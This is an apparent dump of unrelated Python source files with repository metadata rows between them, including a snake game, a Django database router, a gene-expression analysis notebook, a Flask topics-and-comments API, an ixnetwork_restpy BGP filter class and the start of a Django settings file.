        elif (x > alive_button[1][0] and x < alive_button[1][0] + alive_button[1][2] and
                y > alive_button[1][1] and y < alive_button[1][1] + alive_button[1][3]):
            page += 1
            SPEED = 10
            arcade.schedule(on_update, 1/(SPEED))
            print("normal")
        elif (x > alive_button[2][0] and x < alive_button[2][0] + alive_button[2][2] and
                y > alive_button[2][1] and y < alive_button[2][1] + alive_button[2][3]):
            page += 1
            SPEED = 15
            arcade.schedule(on_update, 1/(SPEED))
            print("hard")
        elif (x > alive_button[3][0] and x < alive_button[3][0] + alive_button[3][2] and
                y > alive_button[3][1] and y < alive_button[3][1] + alive_button[3][3]):
            page += 1
            SPEED = 25
            arcade.schedule(on_update, 1/(SPEED))
            print("expert")
        else:
            # NOTE(review): a click outside every button sets SPEED to 1 but
            # does NOT advance the page — confirm this fallback is intended.
            SPEED = 1
    if page == 2:
        # Death screen: try again / main menu / high scores / exit.
        if (x > dead_button[0][0] and x < dead_button[0][0] + dead_button[0][2] and
                y > dead_button[0][1] and y < dead_button[0][1] + dead_button[0][3]):
            restart()
            print("try again")
        elif (x > dead_button[1][0] and x < dead_button[1][0] + dead_button[1][2] and
                y > dead_button[1][1] and y < dead_button[1][1] + dead_button[1][3]):
            start_screen()
            print("main")
        elif (x > dead_button[2][0] and x < dead_button[2][0] + dead_button[2][2] and
                y > dead_button[2][1] and y < dead_button[2][1] + dead_button[2][3]):
            high_score_page()
            print("high score")
        elif (x > dead_button[3][0] and x < dead_button[3][0] + dead_button[3][2] and
                y > dead_button[3][1] and y < dead_button[3][1] + dead_button[3][3]):
            print("exit")
            arcade.close_window()
def setup():
    """Create the window, wire up the event handlers and start the game loop."""
    global grid, SPEED
    # SPEED = float(input("What fast do you want? \n Noob: Type 0.5 \n Normal: Type 1 \n Hard: Type 1.5 - 2 \n Expert: Type 2.5 or more \n *Changes the refresh rate* \n"))
    arcade.open_window(SCREEN_WIDTH, SCREEN_HEIGHT, "snake")
    arcade.set_background_color(arcade.color.BLACK)
    # Drive the game loop at SPEED updates per second.
    arcade.schedule(on_update, 1/SPEED)
    # Override arcade window methods
    window = arcade.get_window()
    window.on_draw = on_draw
    window.on_key_press = on_key_press
    window.on_key_release = on_key_release
    window.on_mouse_press = on_mouse_press
    arcade.run()
if __name__ == '__main__':
    setup()
| [
"clementina1023@gmail.com"
] | clementina1023@gmail.com |
4a383f71e3669538aef1ec2f18596c59815832a7 | 58716860230fd5cfc55355c6d603d8d2eb18646d | /libmodel/django/database_router.py | 19f1cef2c09e36040d61c5f15c3e569e444b23d7 | [
"MIT"
] | permissive | caser789/libmodel | f29b402fd5710d36a8e32c3670cfe89b50e0cfe9 | 8a063737ad568d3f9c4f7ddd78680582f71380f4 | refs/heads/master | 2020-05-18T15:55:31.376819 | 2019-05-06T09:07:47 | 2019-05-06T09:07:47 | 184,513,510 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | class DatabaseRouter(object):
def db_for_read(self, model, **hints):
if hasattr(model, 'Config'):
if hasattr(model.Config, 'db_for_read'):
return model.Config.db_for_read
elif hasattr(model.Config, 'db_for_all'):
return model.Config.db_for_all
return 'default'
def db_for_write(self, model, **hints):
if hasattr(model, 'Config'):
if hasattr(model.Config, 'db_for_write'):
return model.Config.db_for_write
elif hasattr(model.Config, 'db_for_all'):
return model.Config.db_for_all
return 'default'
| [
"jiao.xue@jiaoxue-mac.local"
] | jiao.xue@jiaoxue-mac.local |
1965d7d331cb5c014adede3f2bcbec2a73c14682 | 151d03ad99ae6100030a4f78c6c460f8541412b5 | /new_model_unseen_template/2_run_analysis_example.py | 30e038f61fdfb45feb5416c7bbfdd8d55dd0d352 | [
"BSD-3-Clause"
] | permissive | greenelab/sophie | 4dcb0bb5b35ac5794b40c7cc20377da6b5906807 | 5f07d8558890dca44202010f9e054f28735fae4a | refs/heads/main | 2023-05-29T15:44:36.029820 | 2022-07-05T19:06:29 | 2022-07-05T19:06:29 | 485,827,739 | 5 | 1 | BSD-3-Clause | 2022-07-05T19:06:30 | 2022-04-26T14:44:51 | Python | UTF-8 | Python | false | false | 14,545 | py | # ---
# jupyter:
# jupytext:
# formats: ipynb,py
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.9.1
# kernelspec:
# display_name: Python [conda env:sophie] *
# language: python
# name: conda-env-sophie-py
# ---
# # Template
#
# This notebook allows users to find common and specific genes in their experiment of interest using an *existing* VAE model (model trained by the user using `1_train_example.pynb`) and selecting a template experiment that is *not* included in the training compendium.
#
# This notebook will generate a `generic_gene_summary_<experiment id>.tsv` file that contains z-scores per gene that indicates how specific a gene is the experiment in question.
# %load_ext autoreload
# %load_ext rpy2.ipython
# %autoreload 2
import os
import pandas as pd
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
from ponyo import utils, simulate_expression_data
from sophie import (
process,
stats,
ranking,
)
# ## Inputs
#
# User needs to fill in the [config file](config_new_experiment.tsv) following the instructions provided in the [readme]](README.md)
# +
# Read in config variables
config_filename = "config_example.tsv"
params = utils.read_config(config_filename)
# +
# Load config params
# Root directory containing analysis subdirectories and scripts
base_dir = params["base_dir"]
# Local directory to store intermediate files
local_dir = params["local_dir"]
# File containing un-normalized template experiment
raw_template_filename = params["raw_template_filename"]
# Un-normalized compendium filename
raw_compendium_filename = params["raw_compendium_filename"]
# Normalized compendium filename
normalized_compendium_filename = params["normalized_compendium_filename"]
# ID for template experiment to be selected
project_id = params["project_id"]
# Number of simulated experiments to generate
num_simulated = params["num_simulated"]
# Directory that simulated experiments will be written to
# This directory is created by https://github.com/greenelab/ponyo/blob/master/ponyo/utils.py
simulated_data_dir = params["simulated_data_dir"]
# Directory containing trained VAE model
vae_model_dir = params["vae_model_dir"]
# Size of the latent dimension
latent_dim = params["latent_dim"]
# Scaler transform used to scale compendium data into 0-1 range for training
scaler_transform_filename = params["scaler_transform_filename"]
# Which DE method to use
# We recommend that if data is RNA-seq then use DESeq2 ("deseq")
# If data is microarray then use Limma ("limma")
de_method = params["DE_method"]
# If using DE-seq, setting this parameter will
# remove genes below a certain threshold
count_threshold = params["count_threshold"]
# Metadata file that specifies which samples to keep for DE analysis (Optional)
# By default, a two-condition differential expression analysis is supported (case vs control).
# However, some experiments included more than 2 conditions and so these "extra" samples
# should not considered in the downstream differential expression analysis.
template_process_samples_filename = params["template_process_samples_filename"]
# Metadata file that specifies sample grouping for DE analysis
template_DE_grouping_filename = params["template_DE_grouping_filename"]
# Statistic to use to rank genes or pathways by
# Choices are "log2FoldChange" if using DESeq or "log2FC"
# if using limma as the `de_method`
col_to_rank_genes = params["rank_genes_by"]
# +
# Files generated by this notebook
# File storing template experiment with gene ids mapped to compendium gene ids
mapped_template_filename = params["mapped_template_filename"]
# File storing normalized template experiment
normalized_template_filename = params["normalized_template_filename"]
# File storing processed template experiment,
# after samples have been selected for comparison in DE analysis
processed_template_filename = params["processed_template_filename"]
# Output summary file
output_filename = params["output_filename"]
# -
# ## Process template experiment
#
# This step:
# 1. Normalizes the template experiment such that the template experiment and compendium experiment are in the same range
# 2. Ensures that the feature space (i.e. gene ids) are the same in the template and compendium
#
# The template experiment is expected to have the same genes as the compendium experiment. Genes that are in the template experiment but not in the compendium are removed. Genes that are in the compendium but missing in the template experiment are added and the gene expression value is set to the median gene expression value of that gene across the samples in the compendium. Additionally, the template values are expected to come from the same distribution as the compendium dataset (i.e. both the template and compendium expression measurements are estimated counts). This is necessary since SOPHIE applies the same scale factor used to normalize the compendium to normalize the template experiment. If the template has a different range of expression values, then the scaling will result in outliers (i.e. values greater than 1) which the cross entropy loss in the VAE will not handle.
# Normalize the template experiment and align its gene ids with the compendium.
simulate_expression_data.process_template_experiment(
    raw_template_filename,
    raw_compendium_filename,
    scaler_transform_filename,
    mapped_template_filename,
    normalized_template_filename,
)
# ## Simulate data
# Run simulation
# Generate `num_simulated` experiments by shifting the template in the VAE
# latent space; outputs land in `simulated_data_dir`.
simulate_expression_data.embed_shift_template_experiment(
    normalized_compendium_filename,
    normalized_template_filename,
    vae_model_dir,
    project_id,
    scaler_transform_filename,
    local_dir,
    latent_dim,
    num_simulated,
    simulated_data_dir,
)
# ## Process template and simulated experiments
#
# * Remove samples not required for comparison
# * Make sure ordering of samples matches metadata for proper comparison
# * Make sure values are cast as integers if using DESeq
# * Filter lowly expressed genes if using DESeq
# +
## Update simulated dir
# An absent sample-selection metadata file means "keep all samples".
if not os.path.exists(template_process_samples_filename):
    template_process_samples_filename = None
if de_method == "deseq":
    # Process template data
    stats.process_samples_for_DESeq(
        raw_template_filename,
        template_DE_grouping_filename,
        processed_template_filename,
        count_threshold,
        template_process_samples_filename,
    )
    # Process simulated data
    # Each simulated experiment gets a sibling "<name>_processed.tsv" file,
    # which the DE analysis cell below reads.
    for i in range(num_simulated):
        simulated_filename = os.path.join(
            simulated_data_dir,
            f"selected_simulated_data_{project_id}_{i}.tsv",
        )
        out_simulated_filename = os.path.join(
            simulated_data_dir,
            f"selected_simulated_data_{project_id}_{i}_processed.tsv",
        )
        stats.process_samples_for_DESeq(
            simulated_filename,
            template_DE_grouping_filename,
            out_simulated_filename,
            count_threshold,
            template_process_samples_filename,
        )
else:
    stats.process_samples_for_limma(
        raw_template_filename,
        template_DE_grouping_filename,
        processed_template_filename,
        template_process_samples_filename,
    )
    for i in range(num_simulated):
        simulated_filename = os.path.join(
            simulated_data_dir,
            f"selected_simulated_data_{project_id}_{i}.tsv",
        )
        # NOTE(review): unlike the DESeq branch, no output filename is passed
        # here (third argument is None), yet the R cell below always reads
        # "..._processed.tsv" for simulated data — confirm
        # process_samples_for_limma writes in place / that this branch works.
        stats.process_samples_for_limma(
            simulated_filename,
            template_DE_grouping_filename,
            None,
            template_process_samples_filename,
        )
# ## Differential expression analysis
# Create subdirectory: "<local_dir>/DE_stats/"
# exist_ok avoids failing when the notebook is rerun.
os.makedirs(os.path.join(local_dir, "DE_stats"), exist_ok=True)
# + magic_args="-i template_DE_grouping_filename -i project_id -i processed_template_filename -i local_dir -i base_dir -i de_method" language="R"
#
# source(paste0(base_dir, '/sophie/DE_analysis.R'))
#
# # File created: "<local_dir>/DE_stats/DE_stats_template_data_<project_id>_real.txt"
# if (de_method == "deseq"){
# get_DE_stats_DESeq(
# template_DE_grouping_filename,
# project_id,
# processed_template_filename,
# "template",
# local_dir,
# "real"
# )
# }
# else{
# get_DE_stats_limma(
# template_DE_grouping_filename,
# project_id,
# processed_template_filename,
# "template",
# local_dir,
# "real"
# )
# }
# + magic_args="-i template_DE_grouping_filename -i project_id -i base_dir -i simulated_data_dir -i num_simulated -i de_method" language="R"
#
# source(paste0(base_dir, '/sophie/DE_analysis.R'))
#
# # Files created: "<local_dir>/DE_stats/DE_stats_simulated_data_<project_id>_<n>.txt"
# for (i in 0:(num_simulated-1)){
# simulated_data_filename <- paste(
# simulated_data_dir,
# "/selected_simulated_data_",
# project_id,
# "_",
# i,
# "_processed.tsv",
# sep = ""
# )
# if (de_method == "deseq"){
# get_DE_stats_DESeq(
# template_DE_grouping_filename,
# project_id,
# simulated_data_filename,
# "simulated",
# local_dir,
# i
# )
# }
# else {
# get_DE_stats_limma(
# template_DE_grouping_filename,
# project_id,
# simulated_data_filename,
# "simulated",
# local_dir,
# i
# )
# }
# }
# -
# ## Rank genes
#
# Genes are ranked by their "generic-ness" - how frequently these genes are changed across the simulated experiments using user-specific test statistic provided in the `col_to_rank_genes` params (i.e. log2 fold change).
# +
analysis_type = "DE"
# Path produced by the template DE analysis R cell above.
template_DE_stats_filename = os.path.join(
    local_dir, "DE_stats", f"DE_stats_template_data_{project_id}_real.txt"
)
# Added
# DESeq2 and limma name their statistic/p-value columns differently.
if de_method == "deseq":
    logFC_name = "log2FoldChange"
    pvalue_name = "padj"
else:
    logFC_name = "logFC"
    pvalue_name = "adj.P.Val"
# Rank genes by how frequently they change across the simulated experiments.
template_DE_stats, simulated_DE_summary_stats = ranking.process_and_rank_genes_pathways(
    template_DE_stats_filename,
    local_dir,
    num_simulated,
    project_id,
    analysis_type,
    col_to_rank_genes,
    logFC_name,
    pvalue_name,
)
# -
# ## Summary table
#
# * Gene ID: Gene identifier (hgnc symbols for human data or PA number for *P. aeruginosa* data)
# * (Real): Statistics for template experiment
# * (Simulated): Statistics across simulated experiments
# * Number of experiments: Number of simulated experiments
# * Z-score: High z-score indicates that gene is more changed in template compared to the null set of simulated experiments (high z-score = highly specific to template experiment). These z-scores are true standard scores using mean and standard deviation. The calculation for the z-score for a given gene is
#
# $$
# \frac{\text{log}_2 \text{fold change of the gene in the template experiment} - mean(\text{log}_2 \text{fold change of the gene in simulated experiments)}}{variance(\text{log}_2 \text{fold change of the gene in simulated experiments)}}
# $$
#
# The range of this z-score will vary depending on the number of simulated experiments, so the number of simulated experiments should be held constant if the user is performing multiple SOPHIE runs or if they're comparing to previous SOPHIE runs performed by someone else.
#
# * Percentile (simulated): percentile rank of the median(abs(log fold change)). So its the median absolute change for that gene across the 25 simulated experiments that is then converted to a percentile rank from 0 - 100. Where a higher percentile indicates that the gene was highly changed frequently and would suggest that the gene is more commonly DE.
# * Percent DE (simulated): the fraction of the simulated experiments in which that gene was found to be DE using (log fold change > 1 and adjusted p-value < 0.05). _Note:_ you may find that many genes have a 0 fraction. This is because there is some compression that happens when pushing data through the VAE so the variance of the simulated experiments is lower compared to the real experiment. We are aware of this limitation in the VAE and are looking at how to improve the variance and biological signal captured by the VAE, however we were still able to demonstrate that for now the VAE is able to simulate realistic looking biological experiments in our previous [paper](https://academic.oup.com/gigascience/article/9/11/giaa117/5952607).
#
#
# **Note:**
# * If using DESeq, genes with NaN in only the `Adj P-value (Real)` column are those genes flagged because of the `cooksCutoff` parameter. The cook's distance as a diagnostic to tell if a single sample has a count which has a disproportionate impact on the log fold change and p-values. These genes are flagged with an NA in the pvalue and padj columns of the result table.
#
# * If using DESeq with count threshold, some genes may not be present in all simulated experiments (i.e. the `Number of experiments (simulated)` will not equal the number of simulated experiments you specified in the beginning. This pre-filtering will lead to some genes found in few simulated experiments and so the background/null set for that gene is not robust. Thus, the user should sort by both z-score and number of experiments to identify specific expressed genes.
#
# * If using DESeq without count threshold, some genes may still not be present in all simulated experiments (i.e. the `Number of experiments (simulated)` will not equal the number of simulated experiments you specified in the beginning. If the gene is 0 expressed across all samples and thus automatically given an NA in `log fold change, adjusted p-value` columns. Thus, the user should sort by both z-score and number of experiments to identify specific expressed genes.
#
# For more information you can read [DESeq FAQs](https://bioconductor.org/packages/release/bioc/vignettes/DESeq2/inst/doc/DESeq2.html#pvaluesNA)
# +
# Get summary table
summary_gene_ranks = ranking.generate_summary_table(
template_DE_stats_filename,
template_DE_stats,
simulated_DE_summary_stats,
col_to_rank_genes,
local_dir,
"gene",
params,
)
summary_gene_ranks.sort_values(by="Z score", ascending=False).head(10)
# -
summary_gene_ranks.isna().any()
summary_gene_ranks[summary_gene_ranks.isna().any(axis=1)]
# Save
summary_gene_ranks.to_csv(output_filename, sep="\t")
| [
"alexjlee.21@gmail.com"
] | alexjlee.21@gmail.com |
bb2552195c1f2eeed8c3a81f66292e4bc14d7e1f | 32cb945b9836b6f10985aad8f92b879ee20ccb41 | /blog/models.py | b74733deba6618a1017d2c2fcdc17cc12ac192f1 | [] | no_license | Adrianzctpa/DjangoLearningBlog | 9db48efcf985a731ee16056961bd84784a7fef44 | 763a3f5397262777cfc5f21cd7de2cdbd8819242 | refs/heads/master | 2023-05-15T05:54:55.713061 | 2021-06-12T18:50:12 | 2021-06-12T18:55:25 | 376,334,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Post(models.Model):
    """A blog post written by a site user."""
    title = models.CharField(max_length=100)
    content = models.TextField()
    # Set once at creation (default=, not auto_now_add=, so it can be overridden).
    date_posted = models.DateTimeField(default=timezone.now)
    # Refreshed automatically on every save().
    last_edited = models.DateTimeField(auto_now=True)
    # Deleting the user cascades and deletes their posts.
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    def __str__(self):
        return self.title
    def get_absolute_url(self):
        # Used by generic Create/Update views to redirect after a save.
        return reverse('post-detail', kwargs={"pk": self.pk})
class About(models.Model):
image = models.ImageField(default='default.jpg') | [
"nocommentaryadrian@gmail.com"
] | nocommentaryadrian@gmail.com |
0928364e99cece0452c1080d6db49b5ce77a91f5 | 7803f266bbec4b1c83f383d92e1174a71e1684fd | /routes/api_topics.py | 7fd03335926a00dbf8c0492993356cd09036d52a | [] | no_license | tanqhnguyen/flask-demo | 38803fa272f86d45b75212579b215467a728cf0a | 75f0de717025262ffc2143a720e2c36868b65a9e | refs/heads/master | 2021-05-29T01:52:42.523982 | 2015-04-18T15:24:28 | 2015-04-18T15:24:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,949 | py | from flask import Blueprint, url_for, jsonify, request, g
from flask.ext.babel import gettext as _
from decorators import login_required, check_permission, get_topic
from utils import json_error, json_data, json_error_invalid_request, json_error_database, process_order_input
from models import Comment, Topic, db_session, ModelException
from forms import TopicForm, CommentForm
import logging
import cache.topic as cache
api_topics = Blueprint('api_topics', __name__)
# routes
@api_topics.route('/topics/list', methods=["GET"])
def list():
user = g.user
limit = int(request.args.get('limit', 10))
offset = int(request.args.get('offset', 0))
order = request.args.get('order', '-date_created')
topics = cache.get_topics(user=user, sort_by=order, limit=limit, offset=offset)
pagination = {
"total": Topic.count(),
"offset": int(offset),
"limit": int(limit)
}
return jsonify(dict(data=topics, pagination=pagination))
@api_topics.route('/topics/read', methods=["GET"])
def read():
    # TODO: unimplemented stub — currently returns None (empty 200 body fails
    # in Flask); implement or remove the route.
    pass
@api_topics.route('/topics/create', methods=["POST"])
@login_required(json=True)
def create():
    """Create a new topic from the JSON request body.

    Validates input with TopicForm; on success the topic is persisted, the
    'date_created' cache ranking is refreshed, and the response carries a
    success alert plus the URL the client should redirect to.
    """
    data = request.get_json()
    form = TopicForm(**data)
    if form.validate():
        form_data = form.data
        # Record the submitter's IP alongside the topic.
        form_data['ip'] = request.remote_addr
        try:
            topic = g.user.create_topic(**form_data)
            alert = dict(
                type='success',
                messages=_("Your topic has been created successfully. You will be redirected to it shortly")
            )
            redirect = topic.get_url('view')
            cache.update_sorted_topics(topic, 'date_created')
            return jsonify({"data": topic.json_data(), "alert": alert, "redirect": redirect})
        except ModelException, me:
            # Domain-level failure: surface the model's own error type/message.
            db_session.rollback()
            return json_error(type=me.type, messages=me.message)
        except Exception, e:
            logging.error(e)
            db_session.rollback()
            return json_error_database()
    else:
        return json_error(type="VALIDATION_FAILED", messages=form.errors)
@api_topics.route('/topics/vote', methods=["POST"])
@login_required(json=True)
@get_topic(json=True)
def vote():
    """Cast or change the current user's vote on the topic from @get_topic.

    Returns the topic's updated point total and refreshes the cached
    'points' ranking.
    """
    topic = g.topic
    data = request.get_json()
    # Defaults to an up-vote when the client omits the flag.
    up = data.get('up', True)
    try:
        vote = topic.vote(user=g.user, ip=request.remote_addr, up=up)
        if vote.id:
            # this is an updated vote
            if vote.changed:
                # Flipping a vote swings by 2 topic points (undo 1 + apply 1);
                # the author swings by 6 — presumably undoing the old award
                # (5 up / 1 down) plus applying the new one. TODO confirm.
                points = topic.update_points(up=up, points=2)
                topic.user.update_points(up=up, points=6)
            else:
                points = topic.points
        else:
            # this is a new vote
            points = topic.update_points(up)
            # Author earns 5 points for an up-vote, loses 1 for a down-vote.
            user_points = 1
            if up:
                user_points = 5
            topic.user.update_points(up=up, points=user_points)
        db_session.commit()
        data = {
            "points": points
        }
        cache.update_topic(topic.id, topic)
        cache.update_sorted_topics(topic, 'points')
        return jsonify({"data": data})
    except Exception, e:
        logging.error(e)
        db_session.rollback()
        return json_error_database()
@api_topics.route('/topics/unvote', methods=["POST"])
@login_required(json=True)
@get_topic(json=True)
def unvote():
    """Remove the current user's vote from the topic resolved by @get_topic.

    Reverses the point changes made by vote() on both the topic and its
    author, then returns the topic's updated point total.
    """
    topic = g.topic
    vote = topic.unvote(g.user)
    if not vote:
        # Nothing to remove — the user had not voted on this topic.
        return json_error_invalid_request()
    try:
        # Reverse the vote: removing an up-vote subtracts, and vice versa.
        topic.update_points(up=not vote.up)
        # Up-votes were worth 5 author points, down-votes 1 (mirrors vote()).
        user_points = 5 if vote.up else 1
        topic.user.update_points(up=not vote.up, points=user_points)
        db_session.commit()
        cache.update_topic(topic.id, topic)
        cache.update_sorted_topics(topic, 'points')
        return jsonify({"data": {"points": topic.points}})
    except Exception as e:
        logging.error(e)
        # Fix: roll back the failed transaction so the session stays usable,
        # consistent with every other handler in this module.
        db_session.rollback()
        return json_error_database()
@api_topics.route('/topics/search', methods=["GET"])
def search():
    """Full-text search over topics, paginated via limit/offset query params."""
    query = request.args.get('query')
    limit = int(request.args.get('limit', 10))
    offset = int(request.args.get('offset', 0))
    total = Topic.count_search(query)
    matches = Topic.search(query, offset=offset, limit=limit).get('data')
    return jsonify(dict(
        data=[match.json_data() for match in matches],
        pagination=dict(
            limit=limit,
            offset=offset,
            total=total
        )
    ))
"""
Comments
"""
@api_topics.route('/topics/comments/create', methods=["POST"])
@login_required(json=True)
@get_topic(json=True)
def comment_create():
    """Add a comment to the topic resolved by @get_topic.

    Validates input with CommentForm, bumps the topic's comment counters and
    refreshes the cached 'comment_count' ranking.
    """
    data = request.get_json()
    topic = g.topic
    form = CommentForm(**data)
    if form.validate():
        form_data = form.data
        form_data['user'] = g.user
        # Record the commenter's IP alongside the comment.
        form_data['ip'] = request.remote_addr
        try:
            comment = topic.create_comment(**form_data)
            topic.update_comment_count()
            topic.update_user_comment_count(user_id=comment.user_id)
            db_session.commit()
            cache.update_topic(topic.id, topic)
            cache.update_sorted_topics(topic, 'comment_count')
            return jsonify({"data": comment.json_data()})
        except ModelException, me:
            db_session.rollback()
            return json_error(type=me.type, messages=me.message)
        except Exception, e:
            logging.error(e)
            db_session.rollback()
            return json_error_database()
    else:
        return json_error(type="VALIDATION_FAILED", messages=form.errors)
@api_topics.route('/topics/comments/list', methods=["GET"])
@get_topic(json=True)
def comment_list():
    """Return a page of comments for the topic resolved by @get_topic."""
    topic = g.topic
    limit = request.args.get('limit', 10)
    offset = request.args.get('offset', 0)
    comments = topic.get_comments(limit=limit, offset=offset, json=True)
    page_info = {
        'limit': int(limit),
        'offset': int(offset),
        'total': topic.comment_count
    }
    return jsonify({"data": comments, 'pagination': page_info})
@api_topics.route('/topics/comments/delete', methods=["POST"])
@login_required(json=True)
@check_permission('delete_comment')
def comment_delete():
    """Delete a comment by id (requires the 'delete_comment' permission).

    Decrements the topic's comment counters and refreshes the cached
    'comment_count' ranking.
    """
    data = request.get_json()
    # NOTE(review): `id` shadows the builtin — harmless here but worth renaming.
    id = data.get('id')
    comment = Comment.find_by_pk(id)
    if comment:
        try:
            comment.topic.update_comment_count(offset=-1)
            comment.topic.update_user_comment_count(offset=-1, user_id=comment.user_id)
            comment.delete()
            db_session.commit()
            cache.update_topic(comment.topic.id, comment.topic)
            cache.update_sorted_topics(comment.topic, 'comment_count')
            # Echo the request payload back as confirmation.
            return json_data(data)
        except Exception:
            # NOTE(review): unlike other handlers, the exception is not logged
            # here — consider logging before returning.
            db_session.rollback()
            return json_error_database()
else:
return json_error_invalid_request() | [
"laoshanlung@gmail.com"
] | laoshanlung@gmail.com |
a4c44f2e0343cc29ca7b39dda84c174ba0bae39a | 01733042e84a768b77f64ec24118d0242b2f13b8 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/learnedfilter_dc8ce473700453874488c1ea95947fa8.py | 0e44fc370da4d80e98b03eef81573a428644af64 | [
"MIT"
] | permissive | slieberth/ixnetwork_restpy | e95673905854bc57e56177911cb3853c7e4c5e26 | 23eeb24b21568a23d3f31bbd72814ff55eb1af44 | refs/heads/master | 2023-01-04T06:57:17.513612 | 2020-10-16T22:30:55 | 2020-10-16T22:30:55 | 311,959,027 | 0 | 0 | NOASSERTION | 2020-11-11T12:15:34 | 2020-11-11T12:06:00 | null | UTF-8 | Python | false | false | 5,854 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LearnedFilter(Base):
    """This object contains criteria for filtering the learned routes.
    The LearnedFilter class encapsulates a required learnedFilter resource which will be retrieved from the server every time the property is accessed.
    """
    # NOTE(review): appears to be generated SDK code (boilerplate accessors
    # over _SDM_ATT_MAP) — prefer regenerating over hand-editing.
    __slots__ = ()
    _SDM_NAME = 'learnedFilter'
    # Maps the Python property names below to the attribute names used by the
    # server-side data model.
    _SDM_ATT_MAP = {
        'Afi': 'afi',
        'EnableAfiSafi': 'enableAfiSafi',
        'EnablePrefix': 'enablePrefix',
        'Safi': 'safi',
    }
    def __init__(self, parent):
        super(LearnedFilter, self).__init__(parent)
    @property
    def Capabilities(self):
        """
        Returns
        -------
        - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.capabilities_4db6ad32c315806e926b0bd131f64535.Capabilities): An instance of the Capabilities class

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.capabilities_4db6ad32c315806e926b0bd131f64535 import Capabilities
        # _select() fetches the child resource from the server on every access.
        return Capabilities(self)._select()
    @property
    def Prefix(self):
        """
        Returns
        -------
        - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.prefix_14ff2c47c83ae14aa22718e67f21f827.Prefix): An instance of the Prefix class

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.prefix_14ff2c47c83ae14aa22718e67f21f827 import Prefix
        return Prefix(self)._select()
    @property
    def Afi(self):
        """
        Returns
        -------
        - number: Address Family Identifier value. Identifies the network layer protocol to be used with these routes.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Afi'])
    @Afi.setter
    def Afi(self, value):
        self._set_attribute(self._SDM_ATT_MAP['Afi'], value)
    @property
    def EnableAfiSafi(self):
        """
        Returns
        -------
        - bool: If enabled, allows the user to set values to be used for BGP-MP - the user-specified AFI and SAFI values for the BGP MP_REACH_NLRI.
        """
        return self._get_attribute(self._SDM_ATT_MAP['EnableAfiSafi'])
    @EnableAfiSafi.setter
    def EnableAfiSafi(self, value):
        self._set_attribute(self._SDM_ATT_MAP['EnableAfiSafi'], value)
    @property
    def EnablePrefix(self):
        """
        Returns
        -------
        - bool: If enabled, BGP Prefix Filters configured in this dialog will be used to filter for routes that match those filter entries. Only those routes will be stored in the routing table. If disabled, all learned BGP routes will be stored.
        """
        return self._get_attribute(self._SDM_ATT_MAP['EnablePrefix'])
    @EnablePrefix.setter
    def EnablePrefix(self, value):
        self._set_attribute(self._SDM_ATT_MAP['EnablePrefix'], value)
    @property
    def Safi(self):
        """
        Returns
        -------
        - number: Subsequent Address Family Identifier value. Used with, and provides additional information about, the AFI in the NLRI, per RFC 2858.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Safi'])
    @Safi.setter
    def Safi(self, value):
        self._set_attribute(self._SDM_ATT_MAP['Safi'], value)
    def update(self, Afi=None, EnableAfiSafi=None, EnablePrefix=None, Safi=None):
        """Updates learnedFilter resource on the server.

        Args
        ----
        - Afi (number): Address Family Identifier value. Identifies the network layer protocol to be used with these routes.
        - EnableAfiSafi (bool): If enabled, allows the user to set values to be used for BGP-MP - the user-specified AFI and SAFI values for the BGP MP_REACH_NLRI.
        - EnablePrefix (bool): If enabled, BGP Prefix Filters configured in this dialog will be used to filter for routes that match those filter entries. Only those routes will be stored in the routing table. If disabled, all learned BGP routes will be stored.
        - Safi (number): Subsequent Address Family Identifier value. Used with, and provides additional information about, the AFI in the NLRI, per RFC 2858.

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # Only the locals that match _SDM_ATT_MAP keys are sent to the server.
        return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
| [
"andy.balogh@keysight.com"
] | andy.balogh@keysight.com |
c464ce6e46bd8a08b34d12d4b84518bde3c23e0d | c79702519c499cc553d5d38b13d81ecadbda797c | /python_practice/exp/tutorials/mysite/mysite/settings.py | 70b3faf76f652743233899129c7d422799ed7e23 | [] | no_license | LeeJoohyon/Python_project | e7de60834a0e6596ffe0069438784c3bd8b6edde | 37dbfc9a480640a4f2ff000a461a9fb64367ebc2 | refs/heads/master | 2020-05-20T20:59:26.097060 | 2017-03-15T02:22:18 | 2017-03-15T02:22:18 | 84,523,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,097 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
